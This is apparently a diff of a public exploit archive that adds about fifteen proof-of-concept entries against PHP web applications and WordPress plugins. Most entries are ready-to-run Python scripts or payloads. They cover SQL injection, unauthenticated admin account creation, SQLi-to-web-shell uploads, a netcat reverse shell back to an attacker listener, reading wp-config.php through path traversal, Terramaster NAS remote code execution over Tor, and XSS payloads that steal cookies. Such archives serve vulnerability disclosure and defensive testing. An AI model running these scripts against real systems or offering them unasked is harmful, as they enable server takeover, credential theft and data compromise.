Content-Disposition: form-data; name="_wpcf7"
10
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_version"
5.3.1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_locale"
en_US
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_unit_tag"
wpcf7-f10-p13-o1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_container_post"
...
===============================================================================================================
The request is acccepted, and the code navigates the section $_SERVER['HTTP_CLIENT_IP'] , ip is injected and saved inside the database.
When the administrator clicks on the entry element in the plugin, the XSS is triggered.
# Solution:
Upgrade Contact Form Entries to version 1.1.7

86
exploits/php/webapps/50619.py Executable file
View file

@ -0,0 +1,86 @@
# Exploit Title: WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection
# Date 22/12/2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.plugins-market.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-stats-manager.4.7.zip
# Version: <= 4.7
# Tested on: Ubuntu 18.04
# CVE: CVE-2021-24750
# CWE: CWE-89
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24750/README.md
'''
Description:
The plugin does not properly sanitise and escape the refUrl in the refDetails AJAX action,
available to any authenticated user, which could allow users with a role as low as
subscriber to perform SQL injection attacks
'''
# Banner:
banner = '''
___ _ _ ____ ___ ___ ___ __ ___ __ ___ ___ ___
/ __)( \/ )( ___)___(__ \ / _ \(__ \ / )___(__ \ /. |(__ )| __) / _ \
( (__ \ / )__)(___)/ _/( (_) )/ _/ )((___)/ _/(_ _)/ / |__ \( (_) )
\___) \/ (____) (____)\___/(____)(__) (____) (_)(_/ (___/ \___/
[+] WP Visitor Statistics SQL Injection
[@] Developed by Ron Jost (Hacker5preme)
'''
print(banner)
import argparse
import requests
from datetime import datetime
# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin WP Visitor Statistics - SQL Injection')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
my_parser.add_argument('-C', '--COMMAND', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
command = args.COMMAND
print('')
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
print('')
# Authentication:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
check = session.get(auth_url)
# Header:
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
# Body:
body = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)
# Exploit:
exploit_url = 'http://' + target_ip + ':' + target_port + '/wordpress/wp-admin/admin-ajax.php?action=refDetails&requests={"refUrl":"' + "' " + command + '"}'
exploit = session.get(exploit_url)
print(exploit.text)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))

56
exploits/php/webapps/50621.py Executable file
View file

@ -0,0 +1,56 @@
# Exploit Title: Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)
# Date: 22/12/2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Windows
import requests
import json
url = input('Url:')
if not url.startswith('http://') and not url.startswith('https://'):
url = "http://" + url
if not url.endswith('/'):
url = url + "/"
Username = "tago"
Password = "tagoletta"
reqUrl = url + "classes/Users.php?f=save"
reqHeaders = {
"Accept": "*/*",
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryTagmac",
"X-Requested-With": "XMLHttpRequest",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",
"Origin": url}
reqData = "------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nTago\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nLetta\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+Username+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n"+Password+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n1\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryTagmac--\r\n"
resp = requests.post(reqUrl, headers=reqHeaders, data=reqData)
if resp.status_code == 200:
print("Admin account created")
reqUrl = url + "classes/Login.php?f=login"
reqHeaders = {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",
"Origin": url
}
reqData = {"username": ""+Username+"", "password": ""+Password+""}
resp = requests.post(reqUrl, headers=reqHeaders, data=reqData)
data = json.loads(resp.text)
status = data["status"]
if status == "success":
print("Login Successfully\nUsername:"+ Username+"\nPassword:"+Password)
else:
print("Exploited but not loginned")
else:
print("Not injectable")

71
exploits/php/webapps/50622.py Executable file
View file

@ -0,0 +1,71 @@
# Exploit Title: Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)
# Date: 22/12/2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Ubuntu
# This exploit only works correctly if user is database administrator. if not user is database administrator, continue with sql injection payloads.
import requests
import random
import string
from bs4 import BeautifulSoup
url = input("TARGET = ")
if not url.startswith('http://') and not url.startswith('https://'):
url = "http://" + url
if not url.endswith('/'):
url = url + "/"
payload = "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>"
let = string.ascii_lowercase
shellname = ''.join(random.choice(let) for i in range(15))
resp = requests.get(url)
htmlParser = BeautifulSoup(resp.text, 'html.parser')
getMenu = htmlParser.findAll("a", {"class": "nav-link"})
selectPage = ""
for i in getMenu:
if "movie" in i.text.lower():
selectPage = i["href"]
break
selectPage = selectPage.replace("./","")
findSql = url + selectPage
resp = requests.get(findSql)
htmlParser = BeautifulSoup(resp.text, 'html.parser')
movieList = htmlParser.findAll("a", {"class" : "card card-outline card-primary shadow rounded-0 movie-item text-decoration-none text-dark"})
sqlPage = movieList[0]["href"]
sqlPage = sqlPage.replace("./","")
sqlPage = url + sqlPage
print("\nFinding path")
findPath = requests.get(sqlPage + '\'')
findPath = findPath.text[findPath.text.index("<b>Warning</b>: ")+17:findPath.text.index("</b> on line ")]
findPath = findPath[findPath.index("<b>")+3:len(findPath)]
print("injection page: "+sqlPage)
parser = findPath.split('\\')
parser.pop()
findPath = ""
for find in parser:
findPath += find + "/"
print("\nFound Path : " + findPath)
SQLtoRCE = "-1881' OR 1881=1881 LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -"
SQLtoRCE = SQLtoRCE.replace("#PATH#",findPath+shellname+".php")
SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex())
print("\n\nShell Uploading...")
status = requests.get(sqlPage+SQLtoRCE)
shellOutput = requests.get(url+shellname+".php?tago=whoami")
print("\n\nShell Output : "+shellOutput.text)
print("\nShell Path : " + url+shellname+".php")

88
exploits/php/webapps/50623.py Executable file
View file

@ -0,0 +1,88 @@
# Exploit Title: Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 23/12/2021
# Exploit Author: Jeremiasz Pluta
# Vendor Homepage: https://github.com/rskoolrash/Online-Admission-System
# Software Link: https://github.com/rskoolrash/Online-Admission-System
# Tested on: LAMP Stack (Debian 10)
#!/usr/bin/python
import sys
import re
import argparse
import requests
import time
import subprocess
print('Exploit for Online Admission System 1.0 - Remote Code Execution (Unauthenticated)')
path = '/' #change me if the path to the /oas is in the root directory or another subdir
class Exploit:
def __init__(self, target_ip, target_port, localhost, localport):
self.target_ip = target_ip
self.target_port = target_port
self.localhost = localhost
self.localport = localport
def exploitation(self):
payload = """<?php system($_GET['cmd']); ?>"""
payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f"""
url = 'http://' + target_ip + ':' + target_port + path
r = requests.Session()
print('[*] Resolving URL...')
r1 = r.get(url + 'documents.php')
time.sleep(3)
#Upload the payload file
print('[*] Uploading the webshell payload...')
files = {
'fpic': ('cmd.php', payload + '\n', 'application/x-php'),
'ftndoc': ('', '', 'application/octet-stream'),
'ftcdoc': ('', '', 'application/octet-stream'),
'fdmdoc': ('', '', 'application/octet-stream'),
'ftcdoc': ('', '', 'application/octet-stream'),
'fdcdoc': ('', '', 'application/octet-stream'),
'fide': ('', '', 'application/octet-stream'),
'fsig': ('', '', 'application/octet-stream'),
}
data = {'fpicup':'Submit Query'}
r2 = r.post(url + 'documents.php', files=files, allow_redirects=True, data=data)
time.sleep(3)
print('[*] Setting up netcat listener...')
listener = subprocess.Popen(["nc", "-nvlp", self.localport])
time.sleep(3)
print('[*] Spawning reverse shell...')
print('[*] Watchout!')
r3 = r.get(url + '/studentpic/cmd.php?cmd=' + payload2)
time.sleep(3)
if (r3.status_code == 200):
print('[*] Got shell!')
while True:
listener.wait()
else:
print('[-] Something went wrong!')
listener.terminate()
def get_args():
parser = argparse.ArgumentParser(description='Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)')
parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP')
parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port')
parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP')
parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port')
args = parser.parse_args()
return args
args = get_args()
target_ip = args.url
target_port = args.target_port
localhost = args.localhost
localport = args.localport
exp = Exploit(target_ip, target_port, localhost, localport)
exp.exploitation()

39
exploits/php/webapps/50624.py Executable file
View file

@ -0,0 +1,39 @@
# Exploit Title: WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated)
# Date: 23/12/2021
# Exploit Authors: Nicole Sheinin, Liad Levy
# Vendor Homepage: https://wordpress.org/plugins/seo-local-rank/
# Software Link: https://plugins.svn.wordpress.org/seo-local-rank/tags/2.2.2/
# Version: versions <= 2.2.2
# Tested on: MacOS
# CVE: CVE-2021-39312
# Github repo:
#!/usr/bin/env python3
import argparse, textwrap
import requests
import sys
parser = argparse.ArgumentParser(description="Exploit The True Ranker plugin - Read arbitrary files", formatter_class=argparse.RawTextHelpFormatter)
group_must = parser.add_argument_group('must arguments')
group_must.add_argument("-u","--url", help="WordPress Target URL (Example: http://127.0.0.1:8080)",required=True)
parser.add_argument("-p","--payload", help="Path to read [default] ../../../../../../../../../../wp-config.php", default="../../../../../../../../../../wp-config.php",required=False)
args = parser.parse_args()
if len(sys.argv) <= 2:
print (f"Exploit Usage: ./exploit.py -h [help] -u [url]")
sys.exit()
HOST = args.url
PAYLOAD = args.payload
url = "{}/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php".format(HOST)
payload = "/scripts/simple.php/{}".format(PAYLOAD)
r = requests.post(url,data={'src': payload})
if r.status_code == 200:
print(r.text)
else:
print("No exploit found")

20
exploits/php/webapps/50625.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS)
# Google Dork: NA
# Date: 03-OCT-2021
# Exploit Author: Akash Rajendra Patil
# Vendor Homepage: https://www.yahoobaba.net/project/library-system-in-php
# Software Link: https://www.yahoobaba.net/project/library-system-in-php
# Version: V 1.0
# Tested on: WAMPP
# Description #
Library System in PHP V1.0 is vulnerable to stored cross site scripting because of insufficient user supplied data sanitisation.
# Proof of Concept (PoC) :
#Exploit:
1) Goto: http://localhost/library-system/dashboard.php
2) Login as admin using test credentials: admin/admin
3) Goto: http://localhost/library-system/update-publisher.php?pid=12
4) Enter the following payload in the publisher field: <script>alert(document.cookie)</script>
5) Click on Save
6) Our payload is fired and stored

19
exploits/php/webapps/50626.txt Normal file
View file

@ -0,0 +1,19 @@
# Exploit Title: SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS)
# Date: 28/12/2021
# Exploit Author: Momen Eldawakhly - Cyber Guy - (Resecurity Inc)
# Vendor Homepage: https://www.safarimontage.com/
# Version: 8.3 and 8.5
# Tested on: Ubuntu Linux [Firefox]
# CVE: CVE-2021-45425
# Proof of Concept:
GET /redirect.php?cmd=invalid%27%22()%26%25%3C/body%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E&ret=3 HTTP/1.1
Host: vulnIP
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=SSSION; lang=en
Connection: close

31
exploits/php/webapps/50627.txt Normal file
View file

@ -0,0 +1,31 @@
# Exploit Title: Nettmp NNT 5.1 - SQLi Authentication Bypass
# Date: 23/12/2021
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://wiki.nettemp.tk
# Software Link: https://wiki.nettemp.tk
# Version: nettmp NNT
# Tested on: Linux (Ubuntu 20.04)
Payload:
username: 1' or 1=1;--
password: \
Proof of Concept:
POST /index.php?id=status HTTP/1.1
Host: vuln.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://vuln.com
DNT: 1
Connection: close
Referer: http://vulnIP/index.php?id=status
Cookie: PHPSESSID=v8hmih4u92mftquen8gtvpstsq
Upgrade-Insecure-Requests: 1
username=1%27+or+1%3D1%3B--&password=%5C&form_login=log

15
exploits/php/webapps/50628.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: Hostel Management System 2.1 - Cross Site Scripting (XSS)
# Date: 26/12/2021
# Exploit Author: Chinmay Vishwas Divekar
# Vendor Homepage: https://phpgurukul.com/hostel-management-system/
# Software Link: https://phpgurukul.com/hostel-management-system/
# Version: V 2.1
# Tested on: PopOS_20.10
*Steps to reproduce*
1) Open book-hostel page using following url https://localhost/hostel/book-hostel.php
2) Enter xss payload <img src=x onerror=alert(String.fromCharCode(88,83,83));> on various input fields.
3) Server Accepted our Payload in input fileds.
Affected input fields: Correspondence Address, Guardian Relation, Permanent Address

22
exploits/php/webapps/50630.txt Normal file
View file

@ -0,0 +1,22 @@
# Exploit Title: Hospitalss Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated)
# Date: 30/12/2021
# Exploit Author: twseptian
# Vendor Homepage: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hprms_0.zip
# Version: v1.0
# Tested on: Kali Linux 2021.4
*SQL Injection*
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Hospital's Patient Records Management System v1.0 is vulnerable to SQL injection via the 'id' parameter on the patient list.
*Attack Vector*
An attacker can compromise the database of the application using some automated(or manual) tools like SQLmap.
*Steps to reproduce:*
Step-1: On the dashboard navigate to 'Patient List', then go to 'Action' > 'View Records' page using the following URL:
http://localhost/hprms/admin/?page=patients/view_patient&id=1
Step-2: Put the SQL Injection payloads in 'id' field.
time-based blind payload : page=patients/view_patient&id=1' AND (SELECT 2664 FROM (SELECT(SLEEP(5)))ixec) AND 'XcAY'='XcAY
Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.

122
exploits/php/webapps/50631.txt Normal file
View file

@ -0,0 +1,122 @@
# Exploit Title: Hospitals Patient Records Management System 1.0 - Account TakeOver
# Date: 30/12/2021
# Exploit Author: twseptian
# Vendor Homepage: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hprms_0.zip
# Version: v1.0
# Tested on: Kali Linux 2021.4
*Insecure direct object references (IDOR)*
Insecure Direct Object References (IDOR) occur when an application provides direct access to objects based on user-supplied input.Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system.
*Attack Vector*
An attacker can takeover the Administrator's account
*Steps of reproduce:*
Note: in this case, we used two users, user1 as a staff with user id '4', and admin as an Administrator with user id '1'.
=====================================================================================================================================
Step-1: Log in to the application using user1 account,then on the dashboard navigate to 'My Account'
http://localhost/hprms/admin/?page=user
=====================================================================================================================================
Step-2: Modify the username,lastname and password,then let's intercept the request using burpsuite:
POST /hprms/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------17632878732301879013646251239
Content-Length: 806
Origin: http://localhost
Connection: close
Referer: http://localhost/hprms/admin/?page=user
Cookie: PHPSESSID=32kl57ct3p8nsicsrp8dte2c50
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="id"
4
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="firstname"
user1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="lastname"
admin
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="username"
admin1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="password"
admin1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream
-----------------------------17632878732301879013646251239--
=====================================================================================================================================
Step-3: Change parameter id '4' to id '1'
POST /hprms/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------17632878732301879013646251239
Content-Length: 806
Origin: http://localhost
Connection: close
Referer: http://localhost/hprms/admin/?page=user
Cookie: PHPSESSID=32kl57ct3p8nsicsrp8dte2c50
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="id"
1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="firstname"
user1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="lastname"
admin
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="username"
admin1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="password"
admin1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream
-----------------------------17632878732301879013646251239--
=====================================================================================================================================
step-4: Click 'Forward' on burpsuite. Now user1 is a Administrator.

35
exploits/php/webapps/50634.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection
# Google Dork: Powered by Virtual Airlines Manager [v2.6.2]
# Date: 2021-12-30
# Exploit Author: Milad Karimi
# Vendor Homepage: http://virtualairlinesmanager.net
# Software Link: https://virtualairlinesmanager.net/index.php/vam-releases/
# Version: 2.6.2
# Tested on: Ubuntu 19.04
[1] Vulnerable GET parameter: notam_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=notam&notam_id=[SQLi]
[2] Vulnerable GET parameter: airport=[SQLi]
[PoC] http://localhost/vam/index.php?page=airport_info&airport=[SQLi]
[3] Vulnerable GET parameter: registry_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]
[4] Vulnerable GET parameter: plane_location=[SQLi]
[PoC] http://localhost/vam/index.php?page=fleet_public&plane_location=[SQLi]
[5] Vulnerable GET parameter: hub_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=hub&hub_id=[SQLi]
[6] Vulnerable GET parameter: pilot_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=pilot_details&pilot_id=[SQLi]
[7] Vulnerable GET parameter: registry_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]
[8] Vulnerable GET parameter: event_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=event&event_id=[SQLi]
[9] Vulnerable GET parameter: tour_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=tour_detail&tour_id=[SQLi]

113
exploits/php/webapps/50635.py Executable file
View file

@ -0,0 +1,113 @@
# Exploit Title: Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 12/24/2021
# Exploit Author: n0tme (thatsn0tmysite)
# Full Write-Up: https://thatsn0tmy.site/posts/2021/12/how-to-summon-rces/
# Vendor Homepage: https://www.terra-master.com/
# Version: TOS 4.2.X (4.2.15-2107141517)
# Tested on: 4.2.15, 4.2.10
#/bin/env python
import urllib3
import requests
import json
import argparse
import hashlib
import time
import os
TARGET = None
MAC_ADDRESS = None
PWD = None
TIMESTAMP = None
def tos_encrypt_str(toencrypt):
key = MAC_ADDRESS[6:]
return hashlib.md5(f"{key}{toencrypt}".encode("utf8")).hexdigest()
def user_session(session, username):
session.cookies.clear()
cookies = {"kod_name":username, "kod_token":tos_encrypt_str(PWD)}
if username == "guest":
cookies = {"kod_name":"guest", "kod_token":tos_encrypt_str("")}
for name,value in cookies.items():
session.cookies[name] = value
def download(session, path, save_as=None):
user_session(session, "guest")
r=session.post(f"{TARGET}/module/api.php?mobile/fileDownload", data={"path":path})
filename = os.path.basename(path)
if save_as is not None:
filename = save_as
with open(filename, "wb") as file:
file.write(r.content)
def get_admin_users(session):
download(session, "/etc/group", save_as="/tmp/terramaster_group")
with open("/tmp/terramaster_group", "r") as groups:
for line in groups:
line = line.strip()
fields = line.split(':')
if fields[0] == "admin":
users = fields[3].split(",")
os.remove("/tmp/terramaster_group")
return users
if __name__ == '__main__':
p = argparse.ArgumentParser()
p.add_argument(dest="target", help="Target URL (e.g. http://10.0.0.100:8181)")
p.add_argument("--cmd", dest="cmd", help="Command to run", default="id")
p.add_argument("-d", "--download", dest="download", help="Only download file", default=None)
p.add_argument("-o", "--output", dest="save_as", help="Save downloaded file as", default=None)
p.add_argument("-c", "--create", dest="create", help="Only create admin user (format should be admin:password)", default=None)
p.add_argument("--tor", dest="tor", default=False, action="store_true", help="Use TOR")
p.add_argument("--rce", dest="rce", default=0, type=int, help="RCE to use (1 and 2 have no output)")
args = p.parse_args()
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
TARGET = args.target
s = requests.Session()
if args.tor:
s.proxies = {"http":"socks5://127.0.0.1:9050", "https": "socks5://127.0.0.1:9050"}
s.headers.update({"user-device":"TNAS", "user-agent":"TNAS"})
r=s.post(f"{TARGET}/module/api.php?mobile/wapNasIPS")
try:
j = r.json()
PWD = j["data"]["PWD"]
MAC_ADDRESS = j["data"]["ADDR"]
except KeyError:
exit(1)
TIMESTAMP = str(int(time.time()))
s.headers.update({"signature": tos_encrypt_str(TIMESTAMP), "timestamp": TIMESTAMP})
s.headers.update({"authorization": PWD})
if args.download != None:
download(s, args.download, save_as=args.save_as)
exit(0)
#RCEs
RCEs=[f"{TARGET}/tos/index.php?app/del&id=0&name=;{args.cmd};xx%23",
f"{TARGET}/tos/index.php?app/hand_app&name=;{args.cmd};xx.tpk", #BLIND
f"{TARGET}/tos/index.php?app/app_start_stop&id=ups&start=0&name=donotcare.*.oexe;{args.cmd};xx"] #BLIND
for admin in get_admin_users(s):
user_session(s, admin)
if args.create != None:
user, password = args.create.split(":")
groups = json.dumps(["allusers", "admin"])
r=s.post(f"{TARGET}/module/api.php?mobile/__construct")
r=s.post(f"{TARGET}/module/api.php?mobile/set_user_information", data={"groups":groups, "username":user,"operation":"0","password":password,"capacity":""})
if "create user successful!" in str(r.content, "utf8"):
print(r.content)
break
continue
r = s.get(RCEs[args.rce])
content = str(r.content, "utf-8")
if "<!--user login-->" not in content:
print(content)
exit(0)

60
exploits/php/webapps/50637.txt Normal file
View file

@ -0,0 +1,60 @@
# Exploit Title: openSIS Student Information System 8.0 - 'multiple' SQL Injection
# Date: 26/12/2021
# Exploit Author: securityforeveryone.com
# Author Mail: hello[AT]securityforeveryone.com
# Vendor Homepage: https://opensis.com
# Software Link: https://opensis.com
# Version: 8.0 Community Edition
# Tested on: Linux/Windows
# Researchers : Security For Everyone Team - https://securityforeveryone.com
'''
DESCRIPTION
A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v8.0 via the "student_id" and "TRANSFER{SCHOOL]" parameters in POST request sent to /TransferredOutModal.php.
The vulnerability is found in the "student_id" and "TRANSFER{SCHOOL]" parameters in POST request sent to page /TransferredOutModal.php.
Example:
POST /TransferredOutModal.php?modfunc=detail
Post Data: student_id=1[SQL]&button=Save&TRANSFER[SCHOOL]=[SQL]&TRANSFER[Grade_Level]=5
if an attacker exploits this vulnerability, attacker may access private data in the database system.
EXPLOITATION
POST /TransferredOutModal.php?modfunc=detail HTTP/1.1
Host: localhost
User-Agent: user-agent
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: cookie
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
student_id=1[SQL]&button=Save&TRANSFER[SCHOOL]=[SQL]&TRANSFER[Grade_Level]=5
Example sqlmap Command: sqlmap.py -r request.txt --level 5 --risk 3 -p student_id --random-agent --dbs
Example Payloads:
Payload1: student_id=(SELECT (CASE WHEN (2108=2108) THEN 1 ELSE (SELECT 5728 UNION SELECT 5943) END))&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
Payload2: student_id=1 AND (SELECT 5604 FROM(SELECT COUNT(*),CONCAT(0x7162766a71,(SELECT (ELT(5604=5604,1))),0x717a6a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
Payload3: student_id=1 AND (SELECT 6111 FROM (SELECT(SLEEP(5)))JtuC)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
ABOUT SECURITY FOR EVERYONE TEAM
We are a team that has been working on cyber security in the industry for a long time.
In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities.
We have many free tools that you can use here: https://securityforeveryone.com/tools/free-security-tools
'''

22
exploits/php/webapps/50641.txt Normal file
View file

@ -0,0 +1,22 @@
# Exploit Title: Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)
# Exploit Author: Oscar Gutierrez (m4xp0w3r)
# Date: January 4, 2021
# Vendor Homepage: https://www.projeqtor.org/en/
# Software Link: https://www.projeqtor.org/en/product-en/downloads
# Tested on: Ubuntu, LAAMP
# Vendor: Projeqtor
# Version: v9.3.1
# Exploit Description:
Projeqtor version 9.3.1 suffers from a stored XSS vulnerability via SVG file upload. A low level user can upload svg images that contain malicious Javascript. In this way an attacker can escalate privileges and upload a malicious plugin which results in arbitrary code execution in the server hosting the application.
# Steps to reproduce:
Upload the following XML code as an SVG file and change the xlink for a location that you control. Once the administrator user opens the attachment, the Javascript code hosted by the attacker will execute.
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
